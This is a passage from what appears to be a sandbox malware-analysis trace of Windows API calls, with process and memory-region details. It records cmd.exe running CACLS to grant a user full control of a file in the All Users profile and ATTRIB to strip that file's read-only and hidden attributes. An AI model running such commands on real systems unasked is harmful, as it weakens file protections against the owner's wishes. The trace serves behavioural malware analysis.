0x440ae8 [0182.345] FindClose (in: hFindFile=0x440ae8 | out: hFindFile=0x440ae8) returned 1 [0182.345] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f8e4 | out: lpFindFileData=0x28f8e4) returned 
0x440ae8 [0182.345] FindClose (in: hFindFile=0x440ae8 | out: hFindFile=0x440ae8) returned 1 [0182.345] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0182.345] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0182.345] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0182.345] GetEnvironmentStringsW () returned 0x440308* [0182.345] FreeEnvironmentStringsW (penv=0x440308) returned 1 [0182.345] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.346] GetConsoleOutputCP () returned 0x1b5 [0182.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.346] GetUserDefaultLCID () returned 0x409 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fca8, cchData=128 | out: lpLCData="0") returned 2 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fca8, cchData=128 | out: lpLCData="0") returned 2 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fca8, cchData=128 | out: lpLCData="1") returned 2 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") 
returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0182.346] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0182.346] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0182.347] GetConsoleTitleW (in: lpConsoleTitle=0x4309b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.347] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0182.347] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0182.347] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0182.348] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0182.348] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0182.349] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0182.349] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0182.349] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0182.349] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0182.349] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0182.349] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0182.349] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0182.351] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0182.351] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0182.351] _wcsicmp (_String1="FOR/?", 
_String2="ATTRIB") returned 5 [0182.351] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0182.351] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0182.351] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0182.351] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0182.353] GetConsoleTitleW (in: lpConsoleTitle=0x28f93c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.354] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0182.354] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0182.354] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0182.354] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0182.354] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0182.354] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0182.354] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0182.354] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0182.354] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0182.354] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0182.354] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0182.354] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0182.354] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0182.354] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0182.354] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0182.354] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0182.354] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0182.354] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0182.354] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0182.354] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0182.354] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0182.354] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0182.354] _wcsicmp (_String1="CACLS", 
_String2="CLS") returned -11 [0182.354] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0182.354] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0182.354] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0182.354] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0182.354] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0182.354] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0182.354] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0182.354] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0182.354] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0182.354] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0182.354] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0182.354] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0182.354] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0182.354] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0182.354] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0182.354] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0182.354] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0182.354] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0182.355] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0182.355] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0182.355] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0182.355] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0182.355] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0182.355] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0182.355] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0182.355] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0182.355] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0182.355] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0182.355] _wcsicmp 
(_String1="CACLS", _String2="ECHO") returned -2 [0182.355] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0182.355] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0182.355] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0182.355] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0182.355] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0182.355] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0182.355] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0182.355] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0182.355] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0182.355] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0182.355] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0182.355] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0182.355] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0182.355] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0182.355] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0182.355] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0182.355] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0182.355] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0182.355] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0182.355] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0182.355] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0182.355] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0182.355] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0182.355] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0182.355] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0182.355] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0182.355] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0182.355] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0182.355] 
_wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0182.355] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0182.355] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0182.355] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0182.355] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0182.355] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0182.355] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0182.356] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0182.356] SetErrorMode (uMode=0x0) returned 0x0 [0182.356] SetErrorMode (uMode=0x1) returned 0x0 [0182.356] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x441e98, lpFilePart=0x28f45c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f45c*="Desktop") returned 0x18 [0182.356] SetErrorMode (uMode=0x0) returned 0x1 [0182.356] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.356] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.367] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.368] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0xffffffff [0182.368] GetLastError () returned 0x2 [0182.368] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0xffffffff [0182.368] GetLastError () returned 0x2 [0182.368] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0x442180 [0182.368] FindClose (in: hFindFile=0x442180 | out: hFindFile=0x442180) returned 1 [0182.368] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0xffffffff [0182.368] GetLastError () returned 0x2 [0182.368] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0x442180 [0182.369] FindClose (in: hFindFile=0x442180 | out: hFindFile=0x442180) returned 1 [0182.369] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.369] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.369] GetConsoleTitleW (in: lpConsoleTitle=0x28f6d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.369] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f558, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f620 | out: lpAttributeList=0x28f558, lpSize=0x28f620) returned 1 [0182.370] UpdateProcThreadAttribute (in: lpAttributeList=0x28f558, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f618, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f558, lpPreviousValue=0x0) returned 1 [0182.370] GetStartupInfoW (in: lpStartupInfo=0x28f514 | out: lpStartupInfo=0x28f514*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0182.370] lstrcmpW 
(lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.371] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28f5b4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f600 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x28f600*(hProcess=0x50, hThread=0x4c, dwProcessId=0xda4, dwThreadId=0xcc8)) returned 1 [0182.373] CloseHandle (hObject=0x4c) returned 1 [0182.374] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.374] GetEnvironmentStringsW () returned 0x440308* [0182.374] FreeEnvironmentStringsW (penv=0x440308) returned 1 [0182.374] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0182.420] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x28f4f4 | out: lpExitCode=0x28f4f4*=0x0) returned 1 [0182.420] CloseHandle (hObject=0x50) returned 1 [0182.420] _vsnwprintf (in: _Buffer=0x28f63c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28f500 | out: _Buffer="00000000") returned 8 [0182.420] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0182.420] GetEnvironmentStringsW () returned 0x442410* [0182.420] FreeEnvironmentStringsW (penv=0x442410) returned 1 [0182.420] 
SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.420] GetEnvironmentStringsW () returned 0x442410* [0182.420] FreeEnvironmentStringsW (penv=0x442410) returned 1 [0182.420] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f558 | out: lpAttributeList=0x28f558) [0182.420] GetConsoleTitleW (in: lpConsoleTitle=0x28f93c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.421] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.421] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.421] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.421] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0xffffffff [0182.421] GetLastError () returned 0x2 [0182.422] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0xffffffff [0182.422] GetLastError () returned 0x2 [0182.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0x43e4d8 [0182.422] FindClose (in: hFindFile=0x43e4d8 | out: hFindFile=0x43e4d8) returned 1 [0182.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) 
returned 0xffffffff [0182.422] GetLastError () returned 0x2 [0182.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0x43e4d8 [0182.422] FindClose (in: hFindFile=0x43e4d8 | out: hFindFile=0x43e4d8) returned 1 [0182.423] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.423] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.423] GetConsoleTitleW (in: lpConsoleTitle=0x28f6d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.423] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f558, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f620 | out: lpAttributeList=0x28f558, lpSize=0x28f620) returned 1 [0182.423] UpdateProcThreadAttribute (in: lpAttributeList=0x28f558, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f618, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f558, lpPreviousValue=0x0) returned 1 [0182.423] GetStartupInfoW (in: lpStartupInfo=0x28f514 | out: lpStartupInfo=0x28f514*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0182.423] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.423] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28f5b4*(cb=0x48, lpReserved=0x0, 
lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f600 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"", lpProcessInformation=0x28f600*(hProcess=0x4c, hThread=0x50, dwProcessId=0xd20, dwThreadId=0xc78)) returned 1 [0182.425] CloseHandle (hObject=0x50) returned 1 [0182.425] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.425] GetEnvironmentStringsW () returned 0x442410* [0182.425] FreeEnvironmentStringsW (penv=0x442410) returned 1 [0182.425] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0182.486] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x28f4f4 | out: lpExitCode=0x28f4f4*=0x0) returned 1 [0182.486] CloseHandle (hObject=0x4c) returned 1 [0182.486] _vsnwprintf (in: _Buffer=0x28f63c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28f500 | out: _Buffer="00000000") returned 8 [0182.486] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0182.486] GetEnvironmentStringsW () returned 0x442410* [0182.486] FreeEnvironmentStringsW (penv=0x442410) returned 1 [0182.486] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.486] GetEnvironmentStringsW () returned 0x442410* [0182.486] FreeEnvironmentStringsW (penv=0x442410) returned 1 [0182.486] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f558 | out: lpAttributeList=0x28f558) [0182.487] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.487] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.487] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.487] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0182.487] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.487] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0182.487] SetConsoleInputExeNameW () returned 0x1 [0182.487] GetConsoleOutputCP () returned 0x1b5 [0182.487] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.487] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.487] exit (_Code=0) Process: id = "347" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xda4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "346" os_parent_pid = "0xcb0" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25700 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25701 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25702 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25703 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 25704 
start_va = 0x220000 end_va = 0x228fff entry_point = 0x220000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25705 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25706 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25707 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25708 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25709 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25710 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25711 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25712 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25713 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 25714 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 25715 start_va = 0x75540000 end_va 
